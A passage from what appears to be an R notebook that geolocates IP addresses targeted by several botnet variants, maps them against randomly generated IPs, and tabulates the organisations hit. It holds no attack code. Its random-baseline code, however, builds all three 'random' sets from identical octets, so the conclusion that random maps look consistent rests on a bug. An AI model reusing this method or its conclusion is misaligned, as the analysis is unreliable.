chaff_uwu <- chaff_uwu[
    sample(rownames(chaff_uwu), SAMPLE_SIZE),
]
if(!file.exists("chaff_miori_geo.csv.gz")){
    head(unique(chaff_miori))
    chaff_miori_geo <- geoiporg_df(chaff_miori, "IP.Address")
    write.csv(chaff_miori_geo,
        gzfile("chaff_miori_geo.csv.gz"), row.names=FALSE
    )
} else {
    chaff_miori_geo <- read.csv("chaff_miori_geo.csv.gz")
}
if(!file.exists("chaff_saitama121_geo.csv.gz")){
    head(unique(chaff_saitama121))
    chaff_saitama121_geo <- geoiporg_df(chaff_saitama121, "IP.Address")
    write.csv(chaff_saitama121_geo,
        gzfile("chaff_saitama121_geo.csv.gz"), row.names=FALSE
    )
} else {
    chaff_saitama121_geo <- read.csv("chaff_saitama121_geo.csv.gz")
}
if(!file.exists("chaff_tropicalv1_geo.csv.gz")){
    chaff_tropicalv1_geo <- geoiporg_df(chaff_tropicalv1, "IP.Address")
    write.csv(chaff_tropicalv1_geo,
        gzfile("chaff_tropicalv1_geo.csv.gz"), row.names=FALSE
    )
} else {
    chaff_tropicalv1_geo <- read.csv("chaff_tropicalv1_geo.csv.gz")
}
if(!file.exists("chaff_wgetflood_geo.csv.gz")){
    chaff_wgetflood_geo <- geoiporg_df(chaff_wgetflood, "IP.Address")
    write.csv(chaff_wgetflood_geo,
        gzfile("chaff_wgetflood_geo.csv.gz"), row.names=FALSE
    )
} else {
    chaff_wgetflood_geo <- read.csv("chaff_wgetflood_geo.csv.gz")
}
if(!file.exists("chaff_uwu_geo.csv.gz")){
    chaff_uwu_geo <- geoiporg_df(chaff_uwu, "IP.Address")
    write.csv(chaff_uwu_geo,
        gzfile("chaff_uwu_geo.csv.gz"), row.names=FALSE
    )
} else {
    chaff_uwu_geo <- read.csv("chaff_uwu_geo.csv.gz")
}

Comparing to Random

What if these IPs are just random? There's no way to know from just a single map. So let's look at what randomly generated IP maps looks like to compare to. Also, since we have four sets of data from these things, let's map all of them and compare.

set.seed(238174)
SAMPLE_SIZE <- 5000

octs_01 <- lapply(1:4,
    FUN=function(x){ sample(1:255, SAMPLE_SIZE, replace=TRUE) }
)
octs_02 <- lapply(1:4,
    FUN=function(x){ sample(1:255, SAMPLE_SIZE, replace=TRUE) }
)
octs_03 <- lapply(1:4,
    FUN=function(x){ sample(1:255, SAMPLE_SIZE, replace=TRUE) }
)
octs_04 <- lapply(1:4,
    FUN=function(x){ sample(1:255, SAMPLE_SIZE, replace=TRUE) }
)

random_ips_01 <- paste(
    octs_01[[1]], octs_02[[2]], octs_03[[3]], octs_04[[4]], sep="."
)
random_ips_02 <- paste(
    octs_01[[1]], octs_02[[2]], octs_03[[3]], octs_04[[4]], sep="."
)
random_ips_03 <- paste(
    octs_01[[1]], octs_02[[2]], octs_03[[3]], octs_04[[4]], sep="."
)
if(!file.exists("random_01_geo.csv.gz")){
    random_01_geo_df <- data.frame(IP.Address=random_ips_01)
    random_01_geo <- geoiporg_df(random_01_geo_df, "IP.Address")
    write.csv(random_01_geo, gzfile("random_01_geo.csv.gz"), row.names=FALSE)
} else {
    random_01_geo <- read.csv("random_01_geo.csv.gz")
}
if(!file.exists("random_02_geo.csv.gz")){
    random_02_geo_df <- data.frame(IP.Address=random_ips_02)
    random_02_geo <- geoiporg_df(random_02_geo_df, "IP.Address")
    write.csv(random_02_geo, gzfile("random_02_geo.csv.gz"), row.names=FALSE)
} else {
    random_02_geo <- read.csv("random_02_geo.csv.gz")
}
if(!file.exists("random_03_geo.csv.gz")){
    random_03_geo_df <- data.frame(IP.Address=random_ips_03)
    random_03_geo <- geoiporg_df(random_03_geo_df, "IP.Address")
    write.csv(random_03_geo, gzfile("random_03_geo.csv.gz"), row.names=FALSE)
} else {
    random_03_geo <- read.csv("random_03_geo.csv.gz")
}

miori

g <- world_mapper(country_code_cleanup(chaff_miori_geo$Country.Code))
g <- g + labs(title="Chaff Mapping: miori", x="", y="")
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g

plot of chunk graph_miori

Saitama121

g <- world_mapper(country_code_cleanup(chaff_saitama121_geo$Country.Code))
g <- g + labs(title="Chaff Mapping: Saitama121", x="", y="")
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g

plot of chunk graph_saitama121

TropicalV1

g <- world_mapper(country_code_cleanup(chaff_tropicalv1_geo$Country.Code))
g <- g + labs(title="Chaff Mapping: TropicalV1", x="", y="")
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g

plot of chunk graph_tropicalv1

WGETFLOOD

g <- world_mapper(country_code_cleanup(chaff_wgetflood_geo$Country.Code))
g <- g + labs(title="Chaff Mapping: WGETFLOOD", x="", y="")
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g

plot of chunk graph_wgetflood

UWU

g <- world_mapper(country_code_cleanup(chaff_uwu_geo$Country.Code))
g <- g + labs(title="Chaff Mapping: UWU", x="", y="")
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g

plot of chunk graph_uwu

Random Generation 01

g <- world_mapper(country_code_cleanup(random_01_geo$Country.Code))
g <- g + labs(title="Randomly Generated IP Addresses", x="", y="")
g <- g + scale_fill_continuous(low="#000030", high="#000030", guide="colorbar")
g

plot of chunk graph_random_01

Random Generation 02

g <- world_mapper(country_code_cleanup(random_02_geo$Country.Code))
g <- g + labs(title="Randomly Generated IP Addresses", x="", y="")
g <- g + scale_fill_continuous(low="#000030", high="#000030", guide="colorbar")
g

plot of chunk graph_random_02

Random Generation 03

g <- world_mapper(country_code_cleanup(random_03_geo$Country.Code))
g <- g + labs(title="Randomly Generated IP Addresses", x="", y="")
g <- g + scale_fill_continuous(low="#000030", high="#000030", guide="colorbar")
g

plot of chunk graph_random_03

Organization Name Counts

Since it's pretty clear random is pretty consistent, and none of these graphs are consistent, there's clearly some targeting going on. Even if it were a different random algorithm, there should be some more consistency.

So let's look at the organizations directly being attacked.

miori Targets

chaff_miori_org <- aggregate(
    count ~ Organization.Name, data=chaff_miori_geo, FUN=sum
)
head(chaff_miori_org[
    order(-chaff_miori_org$count), c("count", "Organization.Name")
], n=100)
##     count                                                  Organization.Name
## 233   321                                                         Future use
## 177   267                              DoD Network Information Center (DNIC)
## 393   254                                                          Multicast
## 492   136                            RIPE Network Coordination Centre (RIPE)
## 134    96                           Comcast Cable Communications, LLC (CCCS)
## 329    95                                                             LACNIC
## 57     93                    Asia Pacific Network Information Centre (APNIC)
## 670    85                                           Verizon Business (MCICS)
## 41     81                                 Amazon Technologies Inc. (AT-88-Z)
## 257    67                                    Headquarters, USAISC (HEADQU-3)
## 59     56                                               AT&T Corp. (AC-3280)
## 539    55                                                     SOFTBANK Corp.
## 110    50                               Charter Communications Inc (CC-3517)
## 378    47                                       Microsoft Corporation (MSFT)
## 573    42                                         T-Mobile USA, Inc. (TMOBI)
## 43     35                                         Amazon.com, Inc. (AMAZO-4)
## 105    33                          CenturyLink Communications, LLC (CCL-534)
## 338    33                                      Level 3 Parent, LLC (LPL-141)
## 20     29                       African Network Information Center (AFRINIC)
## 166    28                                                Deutsche Telekom AG
## 223    27                                        Ford Motor Company (FORDMO)
## 332    26 Latin American and Caribbean IP address Regional Registry (LACNIC)
## 50     24                                            Apple Inc. (APPLEC-1-Z)
## 284    23                                                      IBM (IBM-1-Z)
## 641    23                             United States Postal Service. (USPS-3)
## 40     22                        Amateur Radio Digital Communications (ARDC)
## 66     22                                       AT&T Services, Inc. (ATTW-Z)
## 246    22                                               Google LLC (GOOGL-2)
## 708    21                            Windstream Communications LLC (WINDS-6)
## 637    20                                             UK Ministry of Defence
## 23     18                                Air Force Systems Networking (7ESG)
## 80     18                                                 Bell Canada (LINX)
## 149    18                                      Cox Communications Inc. (CXA)
## 283    18                                                 IANA - Private Use
## 114    17                            China Mobile Communications Corporation
## 109    16                                      Charter Communications (CC04)
## 113    16                                                       China Mobile
## 476    16                                                 PSINet, Inc. (PSI)
## 9      15                                                       A100 ROW Inc
## 65     15                                      AT&T Services, Inc. (ATTSE-Z)
## 615    15             The Prudential Insurance Company of America (PICA-3-Z)
## 61     14                                               AT&T Corp. (AC-3873)
## 599    14                                        Telstra Corporation Limited
## 62     13                           AT&T Global Network Services, LLC (ATGS)
## 587    13                                              Telecom Italia S.p.A.
## 14     12                                             Administered by LACNIC
## 26     12                                 Akamai Technologies, Inc. (AKAMAI)
## 64     12                                        AT&T Mobility LLC (ATTMO-3)
## 302    12                         Internet Assigned Numbers Authority (IANA)
## 421    12                            North Star Information Hi.tech Ltd. Co.
## 369    11                                             Mercedes-Benz Group AG
## 370    11                                       Merck and Co., Inc. (MERCKA)
## 191    10                                     Eli Lilly and Company (ELILIL)
## 55      9                                                               ARIN
## 230     9                    Frontier Communications of America, Inc. (FRTR)
## 401     9                   Navy Network Information Center (NNIC) (NNICN-1)
## 427     9                                        NTT America, Inc. (NTTAM-1)
## 532     9                                              SITA Switzerland Sarl
## 262     8                        HEWLETT PACKARD ENTERPRISE COMPANY (HPE-15)
## 518     8                              Service Provider Corporation (SPC-10)
## 520     8                                 Shared Services Canada (SSC-299-Z)
## 522     8                                   Shaw Communications Inc. (SHAWC)
## 32      7                                             Alibaba.com LLC (AL-3)
## 229     7                      Frontier Communications Corporation (FCC-212)
## 312     7                                      JPMorgan Chase & Co. (JMC-39)
## 371     7                                        Merit Network Inc. (MICH-Z)
## 443     7                                              Optimum Online (OPTO)
## 601     7                         Tencent Cloud Computing (Beijing) Co., Ltd
## 395     6               National Aeronautics and Space Administration (NASA)
## 494     6                        Rogers Communications Canada Inc. (RCC-182)
## 550     6                                                    Sprint (SPRN-Z)
## 19      5              African Network Information Center - ( AfriNIC Ltd. )
## 33      5                   Alibaba.com Singapore E-Commerce Private Limited
## 85      5                                              Bharti Airtel Limited
## 129     5                                         Cloudflare, Inc. (CLOUD14)
## 172     5                                                     Dimension Data
## 309     5                                                     JCOM Co., Ltd.
## 419     5                             Nokia of America Corporation (NAC-178)
## 432     5                                        Oath Holdings Inc. (OH-207)
## 444     5                                             Optus Internet Pty Ltd
## 448     5                                                        Orange S.A.
## 475     5                                               PSINet, Inc. (PSI-1)
## 540     5                                SoftLayer Technologies Inc. (SOFTL)
## 663     5                                                  US Courts (AOUSC)
## 685     5                                                   Vodafone Limited
## 711     5                                     Xerox Corporation (XEROX-16-Z)
## 12      4                                            Administered by AFRINIC
## 111     4                              Charter Communications, Inc (CC-3518)
## 244     4                                             Google Fiber Inc. (GF)
## 275     4                                                  HP Inc. (HPINC-Z)
## 326     4                                                           KPN B.V.
## 367     4                                      MegaPath Networks Inc. (MENT)
## 483     4                                 RADIANZ Americas, Inc. (RADIAN-25)
## 551     4                                                      Sprint (SPRN)
## 564     4                                                          SURF B.V.
## 604     4                   Texas Department of Information Resources (TDIR)
## 614     4                         The Procter and Gamble Company (THEPRO-10)
## 699     4                                                Wayport, LLC (WYPR)
## 707     4                                                    WIND TRE S.P.A.
## 8       3                                              A1 Telekom Austria AG

Saitama121 Targets

chaff_saitama121_org <- aggregate(
    count ~ Organization.Name, data=chaff_saitama121_geo, FUN=sum
)
head(chaff_saitama121_org[
    order(-chaff_saitama121_org$count), c("count", "Organization.Name")
], n=100)
##     count                                                  Organization.Name
## 49    129                    Asia Pacific Network Information Centre (APNIC)
## 461   108                            RIPE Network Coordination Centre (RIPE)
## 108    65                            China Mobile Communications Corporation
## 58     50                                   ATI - Agence Tunisienne Internet
## 150    42                                                     Dimension Data
## 355    40                                       Microsoft Corporation (MSFT)
## 636    39                                           Verizon Business (MCICS)
## 167    38                                                         EE Limited
## 51     36                                               AT&T Corp. (AC-3280)
## 153    36                              DoD Network Information Center (DNIC)
## 552    35                                              Telecom Italia S.p.A.
## 311    30                                                             LACNIC
## 145    29                                                Deutsche Telekom AG
## 34     25                                 Amazon Technologies Inc. (AT-88-Z)
## 124    25                           Comcast Cable Communications, LLC (CCCS)
## 599    25                               Turk Telekomunikasyon Anonim Sirketi
## 477    23                                          Saudi Telecom Company JSC
## 313    22 Latin American and Caribbean IP address Regional Registry (LACNIC)
## 564    22                                                 Telenor Sverige AB
## 325    21                       Liquid Telecommunications Operations Limited
## 507    18                                                     SOFTBANK Corp.
## 537    14                                         T-Mobile USA, Inc. (TMOBI)
## 104    13                               Charter Communications Inc (CC-3517)
## 181    13                                                      ETISALAT MISR
## 669    13                                                    WIND TRE S.P.A.
## 36     12                                         Amazon.com, Inc. (AMAZO-4)
## 84     12                                     British Telecommunications PLC
## 57     11                                       AT&T Services, Inc. (ATTW-Z)
## 134    11                                      Cox Communications Inc. (CXA)
## 100    10                          CenturyLink Communications, LLC (CCL-534)
## 103    10                                      Charter Communications (CC04)
## 234    10                                                Hetzner Online GmbH
## 251    10                                                      IBM (IBM-1-Z)
## 546    10                                                            TE Data
## 587    10             The Prudential Insurance Company of America (PICA-3-Z)
## 648    10                                               Virgin Media Limited
## 7       9                                                       A100 ROW Inc
## 223     9                                               Google LLC (GOOGL-2)
## 317     9                                      Level 3 Parent, LLC (LPL-141)
## 609     9                                             UK Ministry of Defence
## 16      8              African Network Information Center - ( AfriNIC Ltd. )
## 17      8                       African Network Information Center (AFRINIC)
## 20      8                                Air Force Systems Networking (7ESG)
## 107     8                                                       China Mobile
## 202     8                                        Ford Motor Company (FORDMO)
## 232     8                                    Headquarters, USAISC (HEADQU-3)
## 252     8                                                        Icosnet SPA
## 374     8                   Navy Network Information Center (NNIC) (NNICN-1)
## 437     8                                               Polkomtel Sp. z o.o.
## 442     8                                                 PSINet, Inc. (PSI)
## 566     8                                                   Telia Company AB
## 640     8                                             Verizon Nederland B.V.
## 663     8                                                     Wana Corporate
## 670     8                            Windstream Communications LLC (WINDS-6)
## 684     8                                                Ziggo Services B.V.
## 393     7                                        NTT America, Inc. (NTTAM-1)
## 563     7                                                   Telenor Norge AS
## 24      6                                 Akamai Technologies, Inc. (AKAMAI)
## 152     6                                                            DNA Oyj
## 183     6                                        Euronet Communications B.V.
## 299     6                                                      JSC "Silknet"
## 306     6                                                           KPN B.V.
## 559     6                                               TELEFONICA DE ESPANA
## 41      5                                            Apple Inc. (APPLEC-1-Z)
## 53      5                           AT&T Global Network Services, LLC (ATGS)
## 147     5                                DIGI Tavkozlesi es Szolgaltato Kft.
## 447     5                                                      PTK-Centertel
## 502     5                                              SITA Switzerland Sarl
## 3       4                                      1&1 Versatel Deutschland GmbH
## 14      4                                             Administered by LACNIC
## 25      4                       Alabama State Department of Education (ASDE)
## 29      4                   Alibaba.com Singapore E-Commerce Private Limited
## 33      4                        Amateur Radio Digital Communications (ARDC)
## 55      4                                        AT&T Mobility LLC (ATTMO-3)
## 56      4                                      AT&T Services, Inc. (ATTSE-Z)
## 149     4                                          DigitalOcean, LLC (DO-13)
## 165     4                                            ecotel communication ag
## 168     4                                                     Eircom Limited
## 170     4                                                          Elisa Oyj
## 269     4                         Integrated Device Technology, Inc. (IDT-5)
## 322     4                                              Link Egypt (Link.NET)
## 353     4                                        Merit Network Inc. (MICH-Z)
## 379     4                                             Net By Net Holding LLC
## 396     4                                        Oath Holdings Inc. (OH-207)
## 412     4                                                  Orange Belgium SA
## 423     4                                        Partner Communications Ltd.
## 494     4                                   Shaw Communications Inc. (SHAWC)
## 521     4                                                          Strato AG
## 562     4                                                        Telenor A/S
## 654     4                                                   Vodafone Limited
## 680     4                            Zebra Technologies Corporation (ZEBRAT)
## 30      3                               Allstream Business US, LLC (ABUL-14)
## 39      3                                      ANS Communications, Inc (ANS)
## 70      3                                              Bharti Airtel Limited
## 83      3                        BRIGHAM YOUNG UNIVERSITY - IDAHO (BRIGH-22)
## 86      3                                                   BT Italia S.p.A.
## 98      3                              Cellcom Fixed Line Communication L.P.
## 129     3                                    Coolwave Communications Limited
## 169     3                                     Eli Lilly and Company (ELILIL)
## 180     3                  Ethiopian Educational Research Network (EthERNet)

TropicalV1 Targets

chaff_tropicalv1_org <- aggregate(
    count ~ Organization.Name, data=chaff_tropicalv1_geo, FUN=sum
)
head(chaff_tropicalv1_org[
    order(-chaff_tropicalv1_org$count), c("count", "Organization.Name")
], n=100)
##     count                                                           Organization.Name
## 488   120                                     RIPE Network Coordination Centre (RIPE)
## 331   102                                                                      LACNIC
## 50     93                             Asia Pacific Network Information Centre (APNIC)
## 166    66                                       DoD Network Information Center (DNIC)
## 19     65                                African Network Information Center (AFRINIC)
## 301    62                                               JPMorgan Chase & Co. (JMC-39)
## 157    39                                                         Deutsche Telekom AG
## 18     35                       African Network Information Center - ( AfriNIC Ltd. )
## 658    32                                                    Verizon Business (MCICS)
## 117    31                                     China Mobile Communications Corporation
## 60     29                                            ATI - Agence Tunisienne Internet
## 106    29                                   CenturyLink Communications, LLC (CCL-534)
## 122    29                                                        Citicorp (CITICO-10)
## 139    29                                    Comcast Cable Communications, LLC (CCCS)
## 162    28                                                              Dimension Data
## 334    27                                               Level 3 Parent, LLC (LPL-141)
## 567    21                                                       Telecom Italia S.p.A.
## 369    19                                                Microsoft Corporation (MSFT)
## 474    19                                                          PSINet, Inc. (PSI)
## 442    18                                                                 Orange S.A.
## 664    18                                                        Virgin Media Limited
## 113    17                                        Charter Communications Inc (CC-3517)
## 520    17                                                             Sprint (SPRN-Z)
## 52     15                                                        AT&T Corp. (AC-3280)
## 246    15                                             Headquarters, USAISC (HEADQU-3)
## 417    15                                                 NTT America, Inc. (NTTAM-1)
## 116    14                                                                China Mobile
## 223    14                                                                    Free SAS
## 599    14                      The Prudential Insurance Company of America (PICA-3-Z)
## 512    13                                                              SOFTBANK Corp.
## 13     12                                                           ADP, INC. (ADP-5)
## 35     12                                          Amazon Technologies Inc. (AT-88-Z)
## 263    11                                                               IBM (IBM-1-Z)
## 6      10                                                       3M Company (3MCOMP-Z)
## 8      10                                                                A100 ROW Inc
## 21     10                                         Air Force Systems Networking (7ESG)
## 58     10                                               AT&T Services, Inc. (ATTSE-Z)
## 333    10          Latin American and Caribbean IP address Regional Registry (LACNIC)
## 651     9                                                           US Courts (AOUSC)
## 36      8                                                  Amazon.com, Inc. (AMAZO-4)
## 390     8                            Navy Network Information Center (NNIC) (NNICN-1)
## 563     8                                                            Tele2 Sverige AB
## 587     8                                                 Telstra Corporation Limited
## 20      7                                                                 AGIS (AGIS)
## 23      7                                               Airtel Networks Kenya Limited
## 55      7                                    AT&T Global Network Services, LLC (ATGS)
## 163     7   Diplomatic Telecommunications Services - Program Office (DTS-PO) (DTSPOD)
## 279     7                                                   Inteliquent, inc. (NTAJC)
## 574     7                                            Telefonica Germany GmbH & Co.OHG
## 184     6                                                               EMTEL LIMITED
## 194     6                                                               ETISALAT MISR
## 220     6                                                 Ford Motor Company (FORDMO)
## 233     6                                                        Google LLC (GOOGL-2)
## 265     6                                                                 Icosnet SPA
## 381     6                                                                 MTN Nigeria
## 552     6                                                  T-Mobile USA, Inc. (TMOBI)
## 579     6                                                          Telenor Sverige AB
## 581     6                                                            Telia Company AB
## 588     6                                            TELUS Communications Inc. (TACE)
## 594     6                          The Egyptian Company for Mobile Services (Mobinil)
## 24      5                                          Akamai Technologies, Inc. (AKAMAI)
## 34      5                                 Amateur Radio Digital Communications (ARDC)
## 59      5                                                AT&T Services, Inc. (ATTW-Z)
## 149     5                                               Cox Communications Inc. (CXA)
## 249     5                                                         Hetzner Online GmbH
## 343     5                                Liquid Telecommunications Operations Limited
## 364     5                                                      Mercedes-Benz Group AG
## 441     5                                                Orange Polska Spolka Akcyjna
## 467     5                                                        Polkomtel Sp. z o.o.
## 568     5                                                            Telecom Malagasy
## 637     5                 University of California - Office of the President (UCOP-Z)
## 671     5                                                               Vodafone GmbH
## 703     5                                     Windstream Communications LLC (WINDS-6)
## 9       4                                                                AAPT Limited
## 53      4                                                        AT&T Corp. (AC-3873)
## 70      4                                                          Bell Canada (LINX)
## 74      4                                                       Bharti Airtel Limited
## 88      4                                                           BSE Software GmbH
## 112     4                                               Charter Communications (CC04)
## 161     4                                                   DigitalOcean, LLC (DO-13)
## 179     4                                                                   Elisa Oyj
## 224     4                                            freenet Datenkommunikations GmbH
## 299     4                                                              JCOM Co., Ltd.
## 368     4                                                          Metrofibre Networx
## 375     4                                           Mobile Telecommunications Company
## 378     4                                             Montgomery College. (MONTGO-11)
## 380     4                                                       MTN COTE D'IVOIRE S.A
## 424     4 Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM
## 428     4                                                              OneNet (OSRHE)
## 435     4                                                      Optus Internet Pty Ltd
## 510     4                                                       SITA Switzerland Sarl
## 513     4                                         SoftLayer Technologies Inc. (SOFTL)
## 557     4                                                                     TDC A/S
## 559     4                                                                     TE Data
## 626     4                                            U.S. Department of State (UDS-6)
## 702     4                                                             WIND TRE S.P.A.
## 708     4                                              Xerox Corporation (XEROX-16-Z)
## 710     4                                                          Xs4all Internet BV
## 7       3                                                       A1 Telekom Austria AG
## 28      3                            Alibaba.com Singapore E-Commerce Private Limited

WGETFLOOD Targets

chaff_wgetflood_org <- aggregate(
    count ~ Organization.Name, data=chaff_wgetflood_geo, FUN=sum
)
head(chaff_wgetflood_org[
    order(-chaff_wgetflood_org$count), c("count", "Organization.Name")
], n=100)
##     count                                                  Organization.Name
## 231   377                                                         Future use
## 394   291                                                          Multicast
## 487   118                            RIPE Network Coordination Centre (RIPE)
## 486   107                                                           RIPE NCC
## 656   102                                           Verizon Business (MCICS)
## 145    94                           Comcast Cable Communications, LLC (CCCS)
## 53     87                                               AT&T Corp. (AC-3280)
## 51     72                    Asia Pacific Network Information Centre (APNIC)
## 327    63                                                             LACNIC
## 379    60                                       Microsoft Corporation (MSFT)
## 531    57                                                     SOFTBANK Corp.
## 339    51                                      Level 3 Parent, LLC (LPL-141)
## 569    48                                         T-Mobile USA, Inc. (TMOBI)
## 35     47                                 Amazon Technologies Inc. (AT-88-Z)
## 120    38                          CenturyLink Communications, LLC (CCL-534)
## 123    37                               Charter Communications Inc (CC-3517)
## 465    37                                                 PSINet, Inc. (PSI)
## 37     36                                         Amazon.com, Inc. (AMAZO-4)
## 128    34                                                       China Mobile
## 24     30                       African Network Information Center (AFRINIC)
## 332    27 Latin American and Caribbean IP address Regional Registry (LACNIC)
## 249    26                                               Google LLC (GOOGL-2)
## 278    24                                                      IBM (IBM-1-Z)
## 122    23                                      Charter Communications (CC04)
## 609    23             The Prudential Insurance Company of America (PICA-3-Z)
## 55     22                           AT&T Global Network Services, LLC (ATGS)
## 221    22                                        Ford Motor Company (FORDMO)
## 59     21                                       AT&T Services, Inc. (ATTW-Z)
## 172    20                                                Deutsche Telekom AG
## 42     19                                            Apple Inc. (APPLEC-1-Z)
## 129    19                            China Mobile Communications Corporation
## 374    19                                             Mercedes-Benz Group AG
## 34     18                        Amateur Radio Digital Communications (ARDC)
## 58     17                                      AT&T Services, Inc. (ATTSE-Z)
## 180    17                              DoD Network Information Center (DNIC)
## 592    17                                        Telstra Corporation Limited
## 704    17                            Windstream Communications LLC (WINDS-6)
## 157    16                                      Cox Communications Inc. (CXA)
## 29     15                                 Akamai Technologies, Inc. (AKAMAI)
## 45     14                                                               ARIN
## 83     12                                                 Bell Canada (LINX)
## 261    12                        HEWLETT PACKARD ENTERPRISE COMPANY (HPE-15)
## 311    12                                      JPMorgan Chase & Co. (JMC-39)
## 421    12                                        Oath Holdings Inc. (OH-207)
## 526    12                                              SITA Switzerland Sarl
## 86     11                                              Bharti Airtel Limited
## 563    10                                                          SURF B.V.
## 195     9                                     Eli Lilly and Company (ELILIL)
## 377     9                                        Merit Network Inc. (MICH-Z)
## 418     9                                        NTT America, Inc. (NTTAM-1)
## 512     9                              Service Provider Corporation (SPC-10)
## 40      8                                      ANS Communications, Inc (ANS)
## 227     8                      Frontier Communications Corporation (FCC-212)
## 375     8                                       Merck and Co., Inc. (MERCKA)
## 413     8                            North Star Information Hi.tech Ltd. Co.
## 532     8                                SoftLayer Technologies Inc. (SOFTL)
## 17      7                                             Administered by LACNIC
## 23      7              African Network Information Center - ( AfriNIC Ltd. )
## 309     7                                                     JCOM Co., Ltd.
## 443     7                                                        Orange S.A.
## 468     7                                             PT.TELKOMSEL Indonesia
## 490     7                        Rogers Communications Canada Inc. (RCC-182)
## 14      6                                            Administered by AFRINIC
## 32      6                   Alibaba.com Singapore E-Commerce Private Limited
## 54      6                                               AT&T Corp. (AC-3873)
## 57      6                                        AT&T Mobility LLC (ATTMO-3)
## 177     6                                                     Dimension Data
## 298     6                         Internet Assigned Numbers Authority (IANA)
## 517     6                                   Shared Services Canada (SSC-299)
## 541     6                                                    Sprint (SPRN-Z)
## 572     6                                        Tata Communications Limited
## 708     6                                     Xerox Corporation (XEROX-16-Z)
## 135     5                                               Citicorp (CITICO-10)
## 224     5                                                           Free SAS
## 228     5                    Frontier Communications of America, Inc. (FRTR)
## 372     5                                      MegaPath Corporation (MC-289)
## 409     5                             Nokia of America Corporation (NAC-178)
## 434     5                                              Optimum Online (OPTO)
## 446     5                          Pakistan Telecommuication company limited
## 464     5                                               PSINet, Inc. (PSI-1)
## 542     5                                                      Sprint (SPRN)
## 598     5                   Texas Department of Information Resources (TDIR)
## 108     4                                             CABLE ONE, INC. (CBL1)
## 141     4                                  COGECO COMMUNICATIONS INC. (CGOC)
## 183     4                         DXC US Latin America Corporation (ESLAC-Z)
## 184     4                           DXC US Latin America Corporation (ESLAC)
## 225     4                      Frontier Communications Corporation (FCC-210)
## 256     4                                    Headquarters, USAISC (HEADQU-3)
## 323     4                                                           KPN B.V.
## 435     4                                              Optimum WiFi (CHL-54)
## 474     4                                        Rackspace Hosting (RACKS-8)
## 584     4                                               TELEFONICA DE ESPANA
## 589     4                                                   Telia Company AB
## 3       3                                              3M Company (3MCOMP-Z)
## 16      3                                               Administered by ARIN
## 60      3                                   ATI - Agence Tunisienne Internet
## 97      3         Board of Regents of the University System of Georgia (SBR)
## 121     3                                                     CERFnet (CERF)
## 124     3                              Charter Communications, Inc (CC-3518)
## 196     3                                                          Elisa Oyj

UWU Targets

chaff_uwu_org <- aggregate(
    count ~ Organization.Name, data=chaff_uwu_geo, FUN=sum
)
head(chaff_uwu_org[
    order(-chaff_uwu_org$count), c("count", "Organization.Name")
], n=100)
##     count                                                  Organization.Name
## 562   174                            RIPE Network Coordination Centre (RIPE)
## 59    108                                               AT&T Corp. (AC-3280)
## 160   108                           Comcast Cable Communications, LLC (CCCS)
## 56    104                    Asia Pacific Network Information Centre (APNIC)
## 784   100                                           Verizon Business (MCICS)
## 41     67                                 Amazon Technologies Inc. (AT-88-Z)
## 121    67                               Charter Communications Inc (CC-3517)
## 622    67                                                     SOFTBANK Corp.
## 439    65                                       Microsoft Corporation (MSFT)
## 188    52                                                Deutsche Telekom AG
## 396    52                                      Level 3 Parent, LLC (LPL-141)
## 199    51                              DoD Network Information Center (DNIC)
## 115    49                          CenturyLink Communications, LLC (CCL-534)
## 668    47                                         T-Mobile USA, Inc. (TMOBI)
## 43     38                                         Amazon.com, Inc. (AMAZO-4)
## 393    36 Latin American and Caribbean IP address Regional Registry (LACNIC)
## 65     34                                       AT&T Services, Inc. (ATTW-Z)
## 126    31                                                       China Mobile
## 720    31             The Prudential Insurance Company of America (PICA-3-Z)
## 21     30                       African Network Information Center (AFRINIC)
## 755    28                                             UK Ministry of Defence
## 120    26                                      Charter Communications (CC04)
## 284    25                                               Google LLC (GOOGL-2)
## 127    23                            China Mobile Communications Corporation
## 297    23                                    Headquarters, USAISC (HEADQU-3)
## 540    23                                                 PSINet, Inc. (PSI)
## 255    22                                        Ford Motor Company (FORDMO)
## 25     21                                Air Force Systems Networking (7ESG)
## 51     21                                            Apple Inc. (APPLEC-1-Z)
## 9      20                                                       A100 ROW Inc
## 40     19                        Amateur Radio Digital Communications (ARDC)
## 323    19                                                      IBM (IBM-1-Z)
## 431    17                                             Mercedes-Benz Group AG
## 28     16                                 Akamai Technologies, Inc. (AKAMAI)
## 64     16                                      AT&T Services, Inc. (ATTSE-Z)
## 169    16                                      Cox Communications Inc. (CXA)
## 80     14                                                 Bell Canada (LINX)
## 697    14                                        Telstra Corporation Limited
## 827    14                            Windstream Communications LLC (WINDS-6)
## 63     13                                        AT&T Mobility LLC (ATTMO-3)
## 219    13                                     Eli Lilly and Company (ELILIL)
## 432    13                                       Merck and Co., Inc. (MERCKA)
## 609    13                                              SITA Switzerland Sarl
## 60     12                                               AT&T Corp. (AC-3873)
## 464    12                   Navy Network Information Center (NNIC) (NNICN-1)
## 479    12                            North Star Information Hi.tech Ltd. Co.
## 594    11                              Service Provider Corporation (SPC-10)
## 628    11                                                    Sprint (SPRN-Z)
## 504     9                                                        Orange S.A.
## 371     8                                      JPMorgan Chase & Co. (JMC-39)
## 496     8                                      Oracle Corporation (ORACLE-4)
## 542     8                                             PT.TELKOMSEL Indonesia
## 599     8                                   Shaw Communications Inc. (SHAWC)
## 258     7                                                           Free SAS
## 482     7                                        NTT America, Inc. (NTTAM-1)
## 486     7                                        Oath Holdings Inc. (OH-207)
## 656     7                                                          SURF B.V.
## 20      6              African Network Information Center - ( AfriNIC Ltd. )
## 31      6                                             Alibaba.com LLC (AL-3)
## 194     6                                          DigitalOcean, LLC (DO-13)
## 567     6                        Rogers Communications Canada Inc. (RCC-182)
## 597     6                                   Shared Services Canada (SSC-299)
## 48      5                                      ANS Communications, Inc (ANS)
## 83      5                                              Bharti Airtel Limited
## 122     5                              Charter Communications, Inc (CC-3518)
## 146     5                                         Cloudflare, Inc. (CLOUD14)
## 283     5                                             Google Fiber Inc. (GF)
## 328     5                                                      iiNet Limited
## 366     5                                                     JCOM Co., Ltd.
## 434     5                                        Merit Network Inc. (MICH-Z)
## 493     5                                              Optimum Online (OPTO)
## 500     5                                           Orange Business Services
## 539     5                                               PSINet, Inc. (PSI-1)
